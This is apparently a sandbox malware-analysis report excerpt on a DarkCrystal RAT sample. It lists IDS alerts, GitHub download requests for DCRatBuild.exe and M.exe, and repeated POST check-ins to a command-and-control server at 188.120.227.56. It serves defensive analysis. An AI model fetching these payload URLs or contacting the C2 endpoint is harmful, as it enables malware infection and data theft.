Source: C:\ServerfontSessiondhcpcommon\System.exe	Code function: 4x nop then jmp 00007FFAAC402026h	34_2_00007FFAAC401E1E
Source: C:\ServerfontSessiondhcpcommon\System.exe	Code function: 4x nop then jmp 00007FFAAC3E2026h	35_2_00007FFAAC3E1E1E

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49797 -> 188.120.227.56:80
Source: Network traffic	Suricata IDS: 2018581 - Severity 1 - ET MALWARE Single char EXE direct download likely trojan (multiple families) : 192.168.2.7:49720 -> 20.233.83.145:443

Source: global traffic	HTTP traffic detected: GET /GGGamessamp/fewfwe/releases/download/ZigZag/DCRatBuild.exe HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /github-production-release-asset-2e65be/868158503/6f820ef3-3e4b-4829-b377-ecdaee20aaa7?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20241210%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241210T063250Z&X-Amz-Expires=300&X-Amz-Signature=b7f80f409a9e7154f221e132ce7390b77b53623d533e4516ea18c9796aa45125&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3DDCRatBuild.exe&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /GGGamessamp/fewfwe/releases/download/ZigZag/M.exe HTTP/1.1Host: github.com

Source: Joe Sandbox View	IP Address: 20.233.83.145 20.233.83.145
Source: Joe Sandbox View	IP Address: 185.199.110.133 185.199.110.133
Source: Joe Sandbox View	IP Address: 185.199.110.133 185.199.110.133

Source: Joe Sandbox View

ASN Name: THEFIRST-ASRU THEFIRST-ASRU

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Network traffic

Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49720 -> 20.233.83.145:443

Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 336Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 384Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2116Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: multipart/form-data; boundary=----Q1J0NfdoMZej8QTisOXN8vSeFSV5WpnDOSUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 112814Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2116Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2532Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2116Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2116Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2116Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2116Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2116Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2076Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2104Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2116Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2116Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2532Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2116Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2532Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 2536Expect: 100-continue

Source: unknown	TCP traffic detected without corresponding DNS query: 188.120.227.56
Source: unknown	TCP traffic detected without corresponding DNS query: 188.120.227.56
Source: unknown	TCP traffic detected without corresponding DNS query: 188.120.227.56
Source: unknown	TCP traffic detected without corresponding DNS query: 188.120.227.56
Source: unknown	TCP traffic detected without corresponding DNS query: 188.120.227.56
Source: unknown	TCP traffic detected without corresponding DNS query: 188.120.227.56
Source: unknown	TCP traffic detected without corresponding DNS query: 188.120.227.56
Source: unknown	TCP traffic detected without corresponding DNS query: 188.120.227.56
Source: unknown	TCP traffic detected without corresponding DNS query: 188.120.227.56
Source: unknown	TCP traffic detected without corresponding DNS query: 188.120.227.56
Source: unknown	TCP traffic detected without corresponding DNS query: 188.120.227.56
Source: unknown	TCP traffic detected without corresponding DNS query: 188.120.227.56
Source: unknown	TCP traffic detected without corresponding DNS query: 188.120.227.56
Source: unknown	TCP traffic detected without corresponding DNS query: 188.120.227.56
Source: unknown	TCP traffic detected without corresponding DNS query: 188.120.227.56
Source: unknown	TCP traffic detected without corresponding DNS query: 188.120.227.56
Source: unknown	TCP traffic detected without corresponding DNS query: 188.120.227.56
Source: unknown	TCP traffic detected without corresponding DNS query: 188.120.227.56
Source: unknown	TCP traffic detected without corresponding DNS query: 188.120.227.56
Source: unknown	TCP traffic detected without corresponding DNS query: 188.120.227.56
Source: unknown	TCP traffic detected without corresponding DNS query: 188.120.227.56
Source: unknown	TCP traffic detected without corresponding DNS query: 188.120.227.56
Source: unknown	TCP traffic detected without corresponding DNS query: 188.120.227.56
Source: unknown	TCP traffic detected without corresponding DNS query: 188.120.227.56
Source: unknown	TCP traffic detected without corresponding DNS query: 188.120.227.56
Source: unknown	TCP traffic detected without corresponding DNS query: 188.120.227.56
Source: unknown	TCP traffic detected without corresponding DNS query: 188.120.227.56
Source: unknown	TCP traffic detected without corresponding DNS query: 188.120.227.56
Source: unknown	TCP traffic detected without corresponding DNS query: 188.120.227.56
Source: unknown	TCP traffic detected without corresponding DNS query: 188.120.227.56
Source: unknown	TCP traffic detected without corresponding DNS query: 188.120.227.56
Source: unknown	TCP traffic detected without corresponding DNS query: 188.120.227.56
Source: unknown	TCP traffic detected without corresponding DNS query: 188.120.227.56
Source: unknown	TCP traffic detected without corresponding DNS query: 188.120.227.56
Source: unknown	TCP traffic detected without corresponding DNS query: 188.120.227.56
Source: unknown	TCP traffic detected without corresponding DNS query: 188.120.227.56
Source: unknown	TCP traffic detected without corresponding DNS query: 188.120.227.56
Source: unknown	TCP traffic detected without corresponding DNS query: 188.120.227.56
Source: unknown	TCP traffic detected without corresponding DNS query: 188.120.227.56
Source: unknown	TCP traffic detected without corresponding DNS query: 188.120.227.56
Source: unknown	TCP traffic detected without corresponding DNS query: 188.120.227.56
Source: unknown	TCP traffic detected without corresponding DNS query: 188.120.227.56
Source: unknown	TCP traffic detected without corresponding DNS query: 188.120.227.56
Source: unknown	TCP traffic detected without corresponding DNS query: 188.120.227.56
Source: unknown	TCP traffic detected without corresponding DNS query: 188.120.227.56
Source: unknown	TCP traffic detected without corresponding DNS query: 188.120.227.56
Source: unknown	TCP traffic detected without corresponding DNS query: 188.120.227.56
Source: unknown	TCP traffic detected without corresponding DNS query: 188.120.227.56
Source: unknown	TCP traffic detected without corresponding DNS query: 188.120.227.56
Source: unknown	TCP traffic detected without corresponding DNS query: 188.120.227.56

Source: global traffic	HTTP traffic detected: GET /GGGamessamp/fewfwe/releases/download/ZigZag/DCRatBuild.exe HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /github-production-release-asset-2e65be/868158503/6f820ef3-3e4b-4829-b377-ecdaee20aaa7?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20241210%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241210T063250Z&X-Amz-Expires=300&X-Amz-Signature=b7f80f409a9e7154f221e132ce7390b77b53623d533e4516ea18c9796aa45125&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3DDCRatBuild.exe&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /GGGamessamp/fewfwe/releases/download/ZigZag/M.exe HTTP/1.1Host: github.com

Source: global traffic	DNS traffic detected: DNS query: github.com
Source: global traffic	DNS traffic detected: DNS query: objects.githubusercontent.com

Source: unknown

HTTP traffic detected: POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 188.120.227.56Content-Length: 336Expect: 100-continueConnection: Keep-Alive

Source: HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2570123434.00000000034BE000.00000004.00000800.00020000.00000000.sdmp, HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2570123434.0000000003652000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://188.120.227.56
Source: HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2570123434.000000000330C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://188.120.227.56/VoiddbVoiddb/
